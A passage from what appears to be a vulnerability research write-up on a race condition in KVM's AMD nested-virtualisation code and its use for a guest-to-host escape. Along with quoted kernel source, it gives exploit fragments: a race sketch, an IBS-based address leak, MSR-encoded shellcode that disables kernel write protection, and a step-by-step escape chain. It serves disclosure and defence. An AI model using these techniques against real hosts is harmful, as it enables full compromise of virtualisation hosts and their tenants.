This means for example, that a guest's memory can be inspected by dumping the allocated memory of its user space process or that resource limits for CPU time and memory can be applied easily. Additionally, KVM can offload most work related to device emulation to the userspace component. Outside of a couple of performance-sensitive devices related to interrupt handling, all of the complex low-level code for providing virtual disk, network or GPU access can be implemented in userspace.  

When looking at public writeups of KVM-related vulnerabilities and exploits it becomes clear that this design was a wise decision. The large majority of disclosed vulnerabilities and all publicly available exploits affect QEMU and its support for emulated/paravirtualized devices.

Even though KVM’s kernel attack surface is significantly smaller than the one exposed by a default QEMU configuration or similar user space VMMs, a KVM vulnerability has advantages that make it very valuable for an attacker:

  • Whereas user space VMMs can be sandboxed to reduce the impact of a VM breakout, no such option is available for KVM itself. Once an attacker is able to achieve code execution (or similarly powerful primitives like write access to page tables) in the context of the host kernel, the system is fully compromised.
  • Due to the somewhat poor security history of QEMU, new user space VMMs like crosvm or Firecracker are written in Rust, a memory safe language. Of course, there can still be non-memory safety vulnerabilities or problems due to incorrect or buggy usage of the KVM APIs, but using Rust effectively prevents the large majority of bugs that were discovered in C-based user space VMMs in the past.
  • Finally, a pure KVM exploit can work against targets that use proprietary or heavily modified user space VMMs. While the big cloud providers do not go into much detail about their virtualization stacks publicly, it is safe to assume that they do not depend on an unmodified QEMU version for their production workloads. In contrast, KVM’s smaller code base makes heavy modifications unlikely (and KVM’s contributor list points at a strong tendency to upstream such modifications when they exist).  

With these advantages in mind, I decided to spend some time hunting for a KVM vulnerability that could be turned into a guest-to-host escape. In the past, I had some success with finding vulnerabilities in KVM’s support for nested virtualization on Intel CPUs so reviewing the same functionality for AMD seemed like a good starting point. This is even more true, because the recent increase of AMD’s market share in the server segment means that KVM’s AMD implementation is suddenly becoming a more interesting target than it was in the last years.

Nested virtualization, the ability for a VM (called L1) to spawn nested guests (L2), was also a niche feature for a long time. However, due to hardware improvements that reduce its overhead and increasing customer demand it’s becoming more widely available. For example, Microsoft is heavily pushing for Virtualization-based Security as part of newer Windows versions, requiring nested virtualization to support cloud-hosted Windows installations. KVM enables support for nested virtualization on both AMD and Intel by default, so if an administrator or the user space VMM does not explicitly disable it, it’s part of the attack surface for a malicious or compromised VM.

AMD’s virtualization extension is called SVM (for Secure Virtual Machine) and in order to support nested virtualization, the host hypervisor needs to intercept all SVM instructions that are executed by its guests, emulate their behavior and keep its state in sync with the underlying hardware. As you might imagine, implementing this correctly is quite difficult with a large potential for complex logic flaws, making it a perfect target for manual code review.

The Bug

Before diving into the KVM codebase and the bug I discovered, I want to quickly introduce how AMD SVM works to make the rest of the post easier to understand. (For a thorough documentation see AMD64 Architecture Programmer’s Manual, Volume 2: System Programming Chapter 15.) SVM adds support for 6 new instructions to x86-64 if SVM support is enabled by setting the SVME bit in the EFER MSR. The most interesting of these instructions is VMRUN, which (as its name suggests) is responsible for running a guest VM. VMRUN takes an implicit parameter via the RAX register pointing to the page-aligned physical address of a data structure called “virtual machine control block” (VMCB), which describes the state and configuration of the VM.
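
For illustration, handing a prepared VMCB to the CPU therefore boils down to loading RAX with its physical address and executing VMRUN. A minimal GCC inline-assembly sketch (this has to run at CPL0 with EFER.SVME set, and vmcb_pa is assumed to be the page-aligned physical address of a valid VMCB):

#include <cstdint>

// Sketch: issue VMRUN on a prepared VMCB. VMRUN takes its single operand
// implicitly in RAX and only returns once the guest triggers a VM exit.
static inline void svm_vmrun(uint64_t vmcb_pa) {
    asm volatile("vmrun" :: "a"(vmcb_pa) : "memory");
}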

The VMCB is split into two parts: First, the State Save area, which stores the values of all guest registers, including segment and control registers. Second, the Control area which describes the configuration of the VM. The Control area describes the virtualization features enabled for a VM,  sets which VM actions are intercepted to trigger a VM exit and stores some fundamental configuration values such as the page table address used for nested paging.

If the VMCB is correctly prepared (and we are not already running in a VM), VMRUN will first save the host state in a memory region called the host save area, whose address is configured by writing a physical address to the VM_HSAVE_PA MSR. Once the host state is saved, the CPU switches to the VM context and VMRUN only returns once a VM exit is triggered for one reason or another.

An interesting aspect of SVM is that a lot of the state recovery after a VM exit has to be done by the hypervisor. Once a VM exit occurs, only RIP, RSP and RAX are restored to the previous host values and all other general purpose registers still contain the guest values. In addition, a full context switch requires manual execution of the VMSAVE/VMLOAD instructions which save/load additional system registers (FS, SS, LDTR, STAR, LSTAR …) from memory.

For nested virtualization to work, KVM intercepts execution of the VMRUN instruction and creates its own VMCB based on the VMCB the L1 guest prepared (called vmcb12 in KVM terminology). Of course, KVM can’t trust the guest provided vmcb12 and needs to carefully validate all fields that end up in the real VMCB that gets passed to the hardware (known as vmcb02).

Most of the KVM’s code for nested virtualization on AMD is implemented in arch/x86/kvm/svm/nested.c and the code that intercepts VMRUN instructions of nested guests is implemented in nested_svm_vmrun:

int nested_svm_vmrun(struct vcpu_svm *svm)

{

        int ret;

        struct vmcb *vmcb12;

        struct vmcb *hsave = svm->nested.hsave;

        struct vmcb *vmcb = svm->vmcb;

        struct kvm_host_map map;

        u64 vmcb12_gpa;

   

        vmcb12_gpa = svm->vmcb->save.rax; ** 1 ** 

        ret = kvm_vcpu_map(&svm->vcpu, gpa_to_gfn(vmcb12_gpa), &map); ** 2 **

        …

        ret = kvm_skip_emulated_instruction(&svm->vcpu);

        vmcb12 = map.hva;

        if (!nested_vmcb_checks(svm, vmcb12)) { ** 3 **

                vmcb12->control.exit_code    = SVM_EXIT_ERR;

                vmcb12->control.exit_code_hi = 0;

                vmcb12->control.exit_info_1  = 0;

                vmcb12->control.exit_info_2  = 0;

                goto out;

        }

        ...

        /*

         * Save the old vmcb, so we don't need to pick what we save, but can

         * restore everything when a VMEXIT occurs

         */

        hsave->save.es     = vmcb->save.es;

        hsave->save.cs     = vmcb->save.cs;

        hsave->save.ss     = vmcb->save.ss;

        hsave->save.ds     = vmcb->save.ds;

        hsave->save.gdtr   = vmcb->save.gdtr;

        hsave->save.idtr   = vmcb->save.idtr;

        hsave->save.efer   = svm->vcpu.arch.efer;

        hsave->save.cr0    = kvm_read_cr0(&svm->vcpu);

        hsave->save.cr4    = svm->vcpu.arch.cr4;

        hsave->save.rflags = kvm_get_rflags(&svm->vcpu);

        hsave->save.rip    = kvm_rip_read(&svm->vcpu);

        hsave->save.rsp    = vmcb->save.rsp;

        hsave->save.rax    = vmcb->save.rax;

        if (npt_enabled)

                hsave->save.cr3    = vmcb->save.cr3;

        else

                hsave->save.cr3    = kvm_read_cr3(&svm->vcpu);

        copy_vmcb_control_area(&hsave->control, &vmcb->control);

        svm->nested.nested_run_pending = 1;

        if (enter_svm_guest_mode(svm, vmcb12_gpa, vmcb12)) ** 4 **

                goto out_exit_err;

        if (nested_svm_vmrun_msrpm(svm))

                goto out;

out_exit_err:

        svm->nested.nested_run_pending = 0;

        svm->vmcb->control.exit_code    = SVM_EXIT_ERR;

        svm->vmcb->control.exit_code_hi = 0;

        svm->vmcb->control.exit_info_1  = 0;

        svm->vmcb->control.exit_info_2  = 0;

        nested_svm_vmexit(svm);

out:

        kvm_vcpu_unmap(&svm->vcpu, &map, true);

        return ret;

}

The function first fetches the value of RAX out of the currently active vmcb (svm->vcmb) in 1 (numbers are marked in the code samples). For guests using nested paging (which is the only relevant configuration nowadays) RAX contains a guest physical address (GPA), which needs to be translated into a host physical address (HPA) first. kvm_vcpu_map (2) takes care of this translation and maps the underlying page to a host virtual address (HVA) that can be directly accessed by KVM.

Once the VMCB is mapped, nested_vmcb_checks is called for some basic validation in 3. Afterwards, the L1 guest context which is stored in svm->vmcb is copied into the host save area svm->nested.hsave before KVM enters the nested guest context by calling enter_svm_guest_mode (4).

int enter_svm_guest_mode(struct vcpu_svm *svm, u64 vmcb12_gpa,

                         struct vmcb *vmcb12)

{

        int ret;

        svm->nested.vmcb12_gpa = vmcb12_gpa;

        load_nested_vmcb_control(svm, &vmcb12->control);

        nested_prepare_vmcb_save(svm, vmcb12);

        nested_prepare_vmcb_control(svm);

        ret = nested_svm_load_cr3(&svm->vcpu, vmcb12->save.cr3,

                                  nested_npt_enabled(svm));

        if (ret)

                return ret;

        svm_set_gif(svm, true);

        return 0;

}

static void load_nested_vmcb_control(struct vcpu_svm *svm,

                                     struct vmcb_control_area *control)

{

        copy_vmcb_control_area(&svm->nested.ctl, control);

        ...

}

Looking at enter_svm_guest_mode we can see that KVM copies the vmcb12 control area directly into svm->nested.ctl and does not perform any further checks on the copied value.

Readers familiar with double fetch or Time-of-Check-to-Time-of-Use vulnerabilities might already see a potential issue here: The call to nested_vmcb_checks at the beginning of nested_svm_vmrun performs all of its checks on a copy of the VMCB that is stored in guest memory. This means that a guest with multiple CPU cores can modify fields in the VMCB after they are verified in nested_vmcb_checks, but before they are copied to svm->nested.ctl in load_nested_vmcb_control.
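
As a rough illustration (not the actual exploit code), the guest side of this race amounts to two vCPUs touching the same vmcb12; the intercept-word location and bit position are assumptions for the sketch:

#include <cstdint>

// Sketch only: guest kernel code (CPL0, EFER.SVME set) racing KVM's
// nested_vmcb_checks(). One vCPU keeps executing VMRUN on vmcb12 while a
// second vCPU flips the INTERCEPT_VMRUN bit in the same vmcb12, so the value
// that was validated can differ from the value later copied into
// svm->nested.ctl.
static volatile uint32_t *vmrun_intercept_word;  // word in vmcb12's control area (assumed)
static const uint32_t INTERCEPT_VMRUN_BIT = 1u;  // assumed bit position

// runs on vCPU 1
void vmrun_loop(uint64_t vmcb12_pa) {
    for (;;)
        asm volatile("vmrun" :: "a"(vmcb12_pa) : "memory");
}

// runs on vCPU 2
void flip_loop(void) {
    for (;;)
        *vmrun_intercept_word ^= INTERCEPT_VMRUN_BIT;
}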

Let’s look at nested_vmcb_checks to see what kind of checks we can bypass with this approach:

static bool nested_vmcb_check_controls(struct vmcb_control_area *control)

{

        if ((vmcb_is_intercept(control, INTERCEPT_VMRUN)) == 0)

                return false;

        if (control->asid == 0)

                return false;

        if ((control->nested_ctl & SVM_NESTED_CTL_NP_ENABLE) &&

            !npt_enabled)

                return false;

        return true;

}

At first glance this looks pretty harmless. control->asid isn’t used anywhere and the last check is only relevant for systems where nested paging isn’t supported. However, the first check turns out to be very interesting.

For reasons unknown to me, SVM VMCBs contain a bit that enables or disables interception of the VMRUN instruction when executed inside a guest. Clearing this bit isn’t actually supported by hardware and results in an immediate VMEXIT, so the check in nested_vmcb_check_controls simply replicates this behavior. When we race and bypass the check by repeatedly flipping the value of the INTERCEPT_VMRUN bit, we can end up in a situation where svm->nested.ctl contains a 0 in place of the INTERCEPT_VMRUN bit. To understand the impact we first need to see how nested vmexits are handled in KVM:

The main SVM exit handler is the function handle_exit in arch/x86/kvm/svm.c, which is called whenever a VMexit occurs. When KVM is running a nested guest, it first has to check if the exit should be handled by itself or the L1 hypervisor. To do this it calls the function nested_svm_exit_handled (5) which will return NESTED_EXIT_DONE if the vmexit will be handled by the L1 hypervisor and no further processing by the L0 hypervisor is needed:

 static int handle_exit(struct kvm_vcpu *vcpu, fastpath_t exit_fastpath)

{

        struct vcpu_svm *svm = to_svm(vcpu);

        struct kvm_run *kvm_run = vcpu->run;

        u32 exit_code = svm->vmcb->control.exit_code;

         

        if (is_guest_mode(vcpu)) {

                int vmexit;

                trace_kvm_nested_vmexit(exit_code, vcpu, KVM_ISA_SVM);

                vmexit = nested_svm_exit_special(svm);

                if (vmexit == NESTED_EXIT_CONTINUE)

                        vmexit = nested_svm_exit_handled(svm); ** 5 **

                if (vmexit == NESTED_EXIT_DONE)

                        return 1;

        }

}

static int nested_svm_intercept(struct vcpu_svm *svm)

{

        // exit_code==INTERCEPT_VMRUN when the L2 guest executes vmrun

        u32 exit_code = svm->vmcb->control.exit_code;

        int vmexit = NESTED_EXIT_HOST;

        switch (exit_code) {

        case SVM_EXIT_MSR:

                vmexit = nested_svm_exit_handled_msr(svm);

                break;

        case SVM_EXIT_IOIO:

                vmexit = nested_svm_intercept_ioio(svm);

                break;

         

        default: {

                if (vmcb_is_intercept(&svm->nested.ctl, exit_code)) ** 7 **

                        vmexit = NESTED_EXIT_DONE;

        }

        }

        return vmexit;

}

int nested_svm_exit_handled(struct vcpu_svm *svm)

{

        int vmexit;

        vmexit = nested_svm_intercept(svm); ** 6 ** 

        if (vmexit == NESTED_EXIT_DONE)

                nested_svm_vmexit(svm); ** 8 **

        return vmexit;

}

nested_svm_exit_handled first calls nested_svm_intercept (6) to see if the exit should be handled. When we trigger an exit by executing VMRUN in a L2 guest, the default case is executed (7) to see if the INTERCEPT_VMRUN bit in svm->nested.ctl is set. Normally, this should always be the case and the function returns NESTED_EXIT_DONE to trigger a nested VM exit from L2 to L1 and to let the L1 hypervisor handle the exit (8). (This way KVM supports infinite nesting of hypervisors).

However, if the L1 guest exploited the race condition described above svm->nested.ctl won’t have the INTERCEPT_VMRUN bit set and the VM exit will be handled by KVM itself. This results in a second call to nested_svm_vmrun while still running inside the L2 guest context. nested_svm_vmrun isn’t written to handle this situation and will blindly overwrite the L1 context stored in svm->nested.hsave with data from the currently active svm->vmcb which contains data for the L2 guest:

     /*

         * Save the old vmcb, so we don't need to pick what we save, but can

         * restore everything when a VMEXIT occurs

         */

        hsave->save.es     = vmcb->save.es;

        hsave->save.cs     = vmcb->save.cs;

        hsave->save.ss     = vmcb->save.ss;

        hsave->save.ds     = vmcb->save.ds;

        hsave->save.gdtr   = vmcb->save.gdtr;

        hsave->save.idtr   = vmcb->save.idtr;

        hsave->save.efer   = svm->vcpu.arch.efer;

        hsave->save.cr0    = kvm_read_cr0(&svm->vcpu);

        hsave->save.cr4    = svm->vcpu.arch.cr4;

        hsave->save.rflags = kvm_get_rflags(&svm->vcpu);

        hsave->save.rip    = kvm_rip_read(&svm->vcpu);

        hsave->save.rsp    = vmcb->save.rsp;

        hsave->save.rax    = vmcb->save.rax;

        if (npt_enabled)

                hsave->save.cr3    = vmcb->save.cr3;

        else

                hsave->save.cr3    = kvm_read_cr3(&svm->vcpu);

        copy_vmcb_control_area(&hsave->control, &vmcb->control);

This becomes a security issue due to the way Model Specific Register (MSR) intercepts are handled for nested guests:

SVM uses a permission bitmap to control which MSRs can be accessed by a VM. The bitmap is an 8KB data structure with two bits per MSR, one of which controls read access and the other write access. A 1 bit in this position means the access is intercepted and triggers a vm exit, a 0 bit means the VM has direct access to the MSR. The HPA address of the bitmap is stored in the VMCB control area and for normal L1 KVM guests, the pages are allocated and pinned into memory as soon as a vCPU is created.
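
As a rough sketch of that layout (region offsets per the AMD APM; treating the even bit of each pair as the read-intercept bit, which matches KVM's own handling, is an assumption of this sketch):

#include <cstdint>
#include <cstdio>

// Returns the bit offset of the read-intercept bit for `msr` inside the 8KB
// MSR permission bitmap, or -1 if the MSR falls outside the mapped ranges.
// The write-intercept bit is the following (odd) bit.
long msrpm_read_bit(uint32_t msr) {
    uint32_t base, region;
    if (msr <= 0x1FFF)                               { base = 0;          region = 0; }
    else if (msr >= 0xC0000000 && msr <= 0xC0001FFF) { base = 0xC0000000; region = 1; }
    else if (msr >= 0xC0010000 && msr <= 0xC0011FFF) { base = 0xC0010000; region = 2; }
    else return -1;
    return (long)region * 0x800 * 8 + (long)(msr - base) * 2;  // 2KB region, 2 bits per MSR
}

int main() {
    std::printf("EFER (0xC0000080) read-intercept bit: %ld\n", msrpm_read_bit(0xC0000080));
    return 0;
}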

For a nested guest, the MSR permission bitmap is stored in svm->nested.msrpm and its physical address is copied into the active VMCB (in svm->vmcb->control.msrpm_base_pa) while the nested guest is running. Using the described double invocation of nested_svm_vmrun, a malicious guest can copy this value into the svm->nested.hsave VMCB when copy_vmcb_control_area is executed. This is interesting because the KVM’s hsave area normally only contains data from the L1 guest context so svm->nested.hsave.msrpm_base_pa would normally point to the pinned vCPU-specific MSR bitmap pages.

This edge case becomes exploitable thanks to a relatively recent change in KVM:

Since commit “2fcf4876: KVM: nSVM: implement on demand allocation of the nested state” from last October, svm->nested.msrpm is dynamically allocated and freed when a guest changes the SVME bit of the MSR_EFER register:

int svm_set_efer(struct kvm_vcpu *vcpu, u64 efer)

{

        struct vcpu_svm *svm = to_svm(vcpu);

        u64 old_efer = vcpu->arch.efer;

        vcpu->arch.efer = efer;

        if ((old_efer & EFER_SVME) != (efer & EFER_SVME)) {

                if (!(efer & EFER_SVME)) {

                        svm_leave_nested(svm);

                        svm_set_gif(svm, true);

                        ...                     /*

                         * Free the nested guest state, unless we are in SMM.

                         * In this case we will return to the nested guest

                         * as soon as we leave SMM.

                         */

                        if (!is_smm(&svm->vcpu))

                                svm_free_nested(svm);

                } ...

}

}

For the “disable SVME” case, KVM will first call svm_leave_nested to forcibly leave potential nested guests and then free the svm->nested data structures (including the backing pages for the MSR permission bitmap) in svm_free_nested. As svm_leave_nested believes that svm->nested.hsave contains the saved context of the L1 guest, it simply copies its control area to the real VMCB:

void svm_leave_nested(struct vcpu_svm *svm)

{

        if (is_guest_mode(&svm->vcpu)) {

                struct vmcb *hsave = svm->nested.hsave;

                struct vmcb *vmcb = svm->vmcb;

                ...

                copy_vmcb_control_area(&vmcb->control, &hsave->control);

                ...

        }

}

But as mentioned before, svm->nested.hsave->control.msrpm_base_pa can still point to svm->nested.msrpm. Once svm_free_nested is finished and KVM passes control back to the guest, the CPU will use the freed pages for its MSR permission checks. This gives a guest unrestricted access to host MSRs if the pages are reused and partially overwritten with zeros.

To summarize, a malicious guest can gain access to host MSRs using the following approach:

  1. Enable the SVME bit in MSR_EFER to enable nested virtualization
  2. Repeatedly try to launch a L2 guest using the VMRUN instruction while flipping the INTERCEPT_VMRUN bit on a second CPU core.
  3. If VMRUN succeeds, try to launch a “L3” guest using another invocation of VMRUN. If this fails, we have lost the race in step 2 and must try again. If VMRUN succeeds we have successfully overwritten svm->nested.hsave with our L2 context.  
  4. Clear the SVME bit in MSR_EFER while still running in the “L3” context. This frees the MSR permission bitmap backing pages used by the L2 guest who is now executing again.
  5. Wait until the KVM host reuses the backing pages. This will potentially clear all or some of the bits, giving the guest access to host MSRs.

When I initially discovered and reported this vulnerability, I was feeling pretty confident that this type of MSR access should be more or less equivalent to full code execution on the host. While my feeling turned out to be correct, getting there still took me multiple weeks of exploit development. In the next section I’ll describe the steps to turn this primitive into a guest-to-host escape.

The Exploit

Assuming our guest can get full unrestricted access to any MSR (which is only a question of timing thanks to init_on_alloc=1 being the default for most modern distributions), how can we escalate this into running arbitrary code in the context of the KVM host? To answer this question we first need to look at what kind of MSRs are supported on a modern AMD system. Looking at the BIOS and Kernel Developer’s Guide for recent AMD processors we can find a wide range of MSRs starting with well known and widely used ones such as EFER (the Extended Feature Enable Register) or LSTAR (the syscall target address) to rarely used ones like SMI_ON_IO_TRAP (can be used to generate a System Management Mode Interrupt when specific IO port ranges are accessed).

Looking at the list, several registers like LSTAR or KERNEL_GSBASE seem like interesting targets for redirecting the execution of the host kernel. Unrestricted access to these registers is actually enabled by default, however they are automatically restored to a valid state by KVM after a vmexit so modifying them does not lead to any changes in host behavior.

Still, there is one MSR that we previously mentioned and that seems to give us a straightforward way to achieve code execution: The VM_HSAVE_PA that stores the physical address of the host save area, which is used to restore the host context when a vmexit occurs. If we can point this MSR at a memory location under our control we should be able to fake a malicious host context and execute our own code after a vmexit.

While this sounds pretty straightforward in theory, implementing it still has some challenges:

  • AMD is pretty clear about the fact that software should not touch the host save area in any way and that the data stored in this area is CPU-dependent: “Processor implementations may store only part or none of host state in the memory area pointed to by VM_HSAVE_PA MSR and may store some or all host state in hidden on-chip memory. Different implementations may choose to save the hidden parts of the host’s segment registers as well as the selectors. For these reasons, software must not rely on the format or contents of the host state save area, nor attempt to change host state by modifying the contents of the host save area.” (AMD64 Architecture Programmer’s Manual, Volume 2: System Programming, Page 477). To strengthen the point, the format of the host save area is undocumented.
  • Debugging issues involving an invalid host state is very tedious as any issue leads to an immediate processor shutdown. Even worse, I wasn’t sure if rewriting the VM_HSAVE_PA MSR while running inside a VM can even work. It’s not really something that should happen during normal operation so in the worst case scenario, overwriting the MSR would just lead to an immediate crash.
  • Even if we can create a valid (but malicious) host save area in our guest, we still need some way to identify its host physical address (HPA). Because our guest runs with nested paging enabled, physical addresses that we can see in the guest (GPAs) are still one address translation away from their HPA equivalent.

After spending some time scrolling through AMD’s documentation, I still decided that VM_HSAVE_PA seems to be the best way forward and decided to tackle these problems one by one.

After dumping the host save area of a normal KVM guest running on an AMD EPYC 7351P CPU, the first problem goes away quickly: As it turns out, the host save area has the same layout as a normal VMCB with only a couple of relevant fields initialized. Even better, the initialized fields include all the saved host information documented in the AMD manual so the fear that all interesting host state is stored in on-chip memory seems to be unfounded.

Saving Host State. To ensure that the host can resume operation after #VMEXIT, VMRUN saves at least the following host state information:

  • CS.SEL, NEXT_RIP—The CS selector and rIP of the instruction following the VMRUN. On #VMEXIT the host resumes running at this address.
  • RFLAGS, RAX—Host processor mode and the register used by VMRUN to address the VMCB.
  • SS.SEL, RSP—Stack pointer for host
  • CR0, CR3, CR4, EFER—Paging/operating mode for host
  • IDTR, GDTR—The pseudo-descriptors. VMRUN does not save or restore the host LDTR.
  • ES.SEL and DS.SEL.

Under the mistaken assumption that I solved the problem of creating a fake but valid host save area, I decided to look into building an infoleak that gives me the ability to translate GPAs to HPAs. A couple hours of manual reading led me to an AMD-specific performance monitoring feature called Instruction Based Sampling (IBS). When IBS is enabled by writing the right magic invocation to a set of MSRs, it samples every Nth instruction that is executed and collects a wide range of information about the instruction. This information is logged in another set of MSRs and can be used to analyze the performance of any piece of code running on the CPU. While most of the documentation for IBS is pretty sparse or hard to follow, the very useful open source project AMD IBS Toolkit contains working code, a readable high level description of IBS and a lot of useful references.

IBS supports two different modes of operation, one that samples Instruction fetches and one that samples micro-ops (which you can think of as the internal RISC representation of more complex x64 instructions). Depending on the operation mode, different data is collected. Besides a lot of caching and latency information that we don’t care about, fetch sampling also returns the virtual address and physical address of the fetched instruction. Op sampling is even more useful as it returns the virtual address of the underlying instruction as well as virtual and physical addresses accessed by any load or store micro op.

Interestingly, IBS does not seem to care about the virtualization context of its user and every physical address returned by it is an HPA (of course this is not a problem outside of this exploit as guest accesses to the IBS MSRs will normally be restricted). The wide range of data returned by IBS and the fact that it’s completely driven by MSR reads and writes make it the perfect tool for building infoleaks for our exploit.

Building a GPA -> HPA leak boils down to enabling IBS ops sampling, executing a lot of instructions that access a specific memory page in our VM and reading the IBS_DC_PHYS_AD MSR to find out its HPA:

// This function leaks the HPA of a guest page using

// AMD's Instruction Based Sampling. We try to sample

// one of our memory loads/writes to *p, which will

// store the physical memory address in MSR_IBS_DC_PHYS_AD

static u64 leak_guest_hpa(u8 *p) {

  volatile u8 *ptr = p;

  u64 ibs = scatter_bits(0x2, IBS_OP_CUR_CNT_23) |

            scatter_bits(0x10, IBS_OP_MAX_CNT) | IBS_OP_EN;

  while (true) {

    wrmsr(MSR_IBS_OP_CTL, ibs);

    u64 x = 0;

    for (int i = 0; i < 0x1000; i++) {

      x = ptr[i];

      ptr[i] += ptr[i - 1];

      ptr[i] = x;

      if (i % 50 == 0) {

        u64 valid = rdmsr(MSR_IBS_OP_CTL) & IBS_OP_VAL;

        if (valid) {

          u64 op3 = rdmsr(MSR_IBS_OP_DATA3);

          if ((op3 & IBS_ST_OP) || (op3 & IBS_LD_OP)) {

            if (op3 & IBS_DC_PHY_ADDR_VALID) {

              printf("[x] leak_guest_hpa: %lx %lx %lx\n", rdmsr(MSR_IBS_OP_RIP),

                     rdmsr(MSR_IBS_DC_PHYS_AD), rdmsr(MSR_IBS_DC_LIN_AD));

              return rdmsr(MSR_IBS_DC_PHYS_AD) & ~(0xFFF);

            }

          }

          wrmsr(MSR_IBS_OP_CTL, ibs);

        }

      }

    }

    wrmsr(MSR_IBS_OP_CTL, ibs & ~IBS_OP_EN);

  }

}

Using this infoleak primitive, I started to create a fake host save area by preparing my own page tables (for pointing CR3 at them), interrupt descriptor tables and segment descriptors and pointing RIP to a primitive shellcode that would write to the serial console. Of course, my first tries immediately crashed the whole system and even after spending multiple days to make sure everything was set up correctly, the system would crash immediately once I pointed the hsave MSR at my own location.

After getting frustrated with the total lack of progress, watching my server reboot for the hundredth time, trying to come up with a different exploitation strategy for two weeks and learning about the surprising regularity of physical page migrations on Linux, I realized that I made an important mistake. Just because the CPU initializes all the expected fields in the host save area, it is not safe to assume that these fields are actually used for restoring the host context. Slow trial and error led to the discovery that my AMD EPYC CPU ignores everything in the host save area besides the values of the RIP, RSP and RAX registers.

While this register control would make a local privilege escalation straightforward, escaping the VM boundary is a bit more complicated. RIP and RSP control make launching a kernel ROP chain the next logical step, but this requires us to first break the host kernel's address randomization and to find a way to store controlled data at a known host virtual address (HVA).

Fortunately, we have IBS as a powerful infoleak building primitive and can use it to gather all required information in a single run:

  • Leaking the host kernel's (or more specifically kvm-amd.ko’s) base address can be done by enabling IBS sampling with a small sampling interval and immediately triggering a VM exit. When VM execution continues, the IBS result MSRs will contain the HVA of instructions executed by KVM during the exit handling.
  • The most powerful way to store data at a known HVA is to leak the location of the kernel’s linear mapping (also known as physmap), a 1:1 mapping of all physical pages on the system. This gives us a GPA->HVA translation primitive by first using our GPA->HPA infoleak from above and then adding the HPA to the physmap base address. Leaking the physmap is possible by sampling micro ops in the host kernel until we find a read or write operation, where the lower ~30 bits of the accessed virtual address and physical address are identical (a small sketch of this derivation follows the list).
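
A minimal sketch of that derivation (the helper names are ours):

#include <cstdint>

// Once IBS returns a load/store sample whose virtual and physical addresses
// share their low bits (i.e. the access went through the linear mapping),
// the physmap base falls out by subtraction ...
static uint64_t physmap_base_from_sample(uint64_t sampled_hva, uint64_t sampled_hpa) {
    return sampled_hva - sampled_hpa;
}

// ... and combined with the GPA->HPA infoleak this yields a GPA->HVA primitive.
static uint64_t hpa_to_hva(uint64_t physmap_base, uint64_t leaked_hpa) {
    return physmap_base + leaked_hpa;
}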

Having all these building blocks in place, we could now try to build a kernel ROP chain that executes some interesting payload. However, there is one important caveat. When we take over execution after a vmexit, the system is still in a somewhat unstable state. As mentioned above, SVM’s context switching is very minimal and we are at least one VMLOAD instruction and reenabling of interrupts away from a usable system. While it is surely possible to exploit this bug and to restore the original host context using a sufficiently complex ROP chain, I decided to find a way to run my own code instead.

A couple of years ago, the Linux physmap was still mapped executable and executing our own code would be as simple as jumping to a physmap mapping of one of our guest pages. Of course, that is not possible anymore and the kernel tries hard to not have any memory pages mapped as writable and executable. Still, page protections only apply to virtual memory accesses so why not use an instruction that directly writes controlled data to a physical address? As you might remember from our initial discussion of SVM earlier in this chapter, SVM supports an instruction called VMSAVE to store hidden guest state (or host state) in a VMCB. Similar to VMRUN, VMSAVE takes a physical address to a VMCB stored in the RAX register as an implicit argument. It then writes the following register state to the VMCB:

  • FS, GS, TR, LDTR
  • KernelGsBase
  • STAR, LSTAR, CSTAR, SFMASK
  • SYSENTER_CS, SYSENTER_ESP, SYSENTER_EIP

For us, VMSAVE is interesting for a couple of reasons:

  • It is used as part of KVM’s normal SVM exit handler and can be easily integrated into a minimal ROP chain.
  • It operates on physical addresses, so we can use it to write to an arbitrary memory location including KVM’s own code.
  • All written registers still contain the guest values set by our VM, allowing us to control the written content with some restrictions

VMSAVE’s biggest downside as an exploitation primitive is that RAX needs to be page aligned, reducing our control of the target address. VMSAVE writes to the memory offsets 0x440-0x480 and 0x600-0x638 so we need to be careful about not corrupting any memory that’s in use.

In our case this turns out to be a non-issue, as KVM contains a couple of code pages where functions that are rarely or never used (e.g cleanup_module or SEV specific code) are stored at these offsets.

While we don’t have full control over the written data and valid register values are somewhat restricted, it is still possible to write a minimal stage0 shellcode to an arbitrary page in the host kernel by filling guest MSRs with the right values. My exploit uses the STAR, LSTAR and CSTAR registers for this which are written to the physical offsets 0x400, 0x408 and 0x410. As all three registers need to contain canonical addresses, we can only use parts of the registers for our shellcode and use relative jumps to skip the unusable parts of the STAR and LSTAR MSRs:

  // mov cr0, rbx; jmp

  wrmsr(MSR_STAR, 0x00000003ebc3220f);

  // pop rdi; pop rsi; pop rcx; jmp

  wrmsr(MSR_LSTAR, 0x00000003eb595e5fULL);

  // rep movsb; pop rdi; jmp rdi;

  wrmsr(MSR_CSTAR, 0xe7ff5fa4f3);

The above code makes use of the fact that we control the value of the RBX register and the stack when we return to it as part of our initial ROP chain. First, we copy the value of RBX (0x80040033) into CR0, which disables Write Protection (WP) for kernel memory accesses. This makes all of the kernel code writable on this CPU allowing us to copy a larger stage1 shellcode to an arbitrary unused memory location and jump to it.

Once the WP bit in cr0 is disabled and the stage1 payload executes, we have a wide range of options. For my proof-of-concept exploit I decided on a somewhat boring but easy-to-implement approach to spawn a random user space command: The host is still in a very weird state so our stage1 payload can’t directly call into other kernel functions, but we can easily backdoor a function pointer which will be called at some later point in time. KVM uses the kernel’s global workqueue feature to regularly synchronize a VM’s clock between different vCPUs. The function pointer responsible for this work is stored in the (per VM) kvm->arch data structure as kvm->arch.kvmclock_update_work. The stage1 payload overrides this function pointer with the address of a stage2 payload. To put the host into a usable state it then sets the VM_HSAVE_PA MSR back to its original value and restores RSP and RIP to call the original vmexit handler.

The final stage2 payload executes at some later point in time as part of the kernel global work queue and uses call_usermodehelper to run an arbitrary command with root privileges.

Let’s put all of this together and walk through the attack step-by-step:

  1. Prepare the stage0 payload by splitting it up and setting the right guest MSRs.
  2. Trigger the TOCTOU vulnerability in nested_svm_vmrun and free the MSR permission bitmap by disabling the SVME bit in the EFER MSR.
  3. Wait for the pages to be reused and initialized to 0 to get unrestricted MSR access.
  4. Prepare a fake host save area, a stack for the initial ROP chain and a staging memory area for the stage1 and stage2 payloads.
  5. Leak the HPA of the host save area, the HVA addresses of the stack and staging page and the kvm-amd.ko’s base address using the different IBS infoleaks.
  6. Redirect execution to the VMSAVE gadget by setting RIP, RSP and RAX in the fake host save area, pointing the VM_HSAVE_PA MSR at it and triggering a VM exit.
  7. VMSAVE writes the stage0 payload to an unused offset in kvm-amd’s code segment, when the gadget returns stage0 gets executed.
